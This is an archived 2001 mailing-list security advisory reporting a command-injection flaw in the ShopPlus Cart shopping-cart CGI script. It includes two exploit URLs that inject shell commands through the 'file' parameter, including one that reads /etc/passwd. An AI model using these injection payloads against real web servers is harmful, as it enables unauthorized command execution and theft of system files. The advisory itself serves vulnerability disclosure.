|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: Kernel|X| (secure
punkass.com)Date: Wed Sep 05 2001 - 14:06:56 CDT
------------[ advisory ]------------
name: ShopPlus Cart
Bug Information:
The ShopPlus shopping cart system allows you to build a store or a mall on the Internet.
Because of its flexibility, it allows you to sell virtually any product or services and
fully customize the shopping experience of your web site.
http://www.ksofttech.com/help/shopplus/
Problem:
Script doesnt check symbols. any user can execute commands on webserver.
Exploit:
host/scripts/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;uid|
host/scripts/shopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|
Bug found by Kernel|X| and aLph4Num3ric
E-Mail:
securepunkass.com [kernel|x|]
alph4num3riccrackdealer.com [aLph4Num3ric]
WWW: www.russiahack.com / www.tmgroup.sh
------------
Thank you for using Anonymous mail system! message sent from www.tmgroup.sh
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]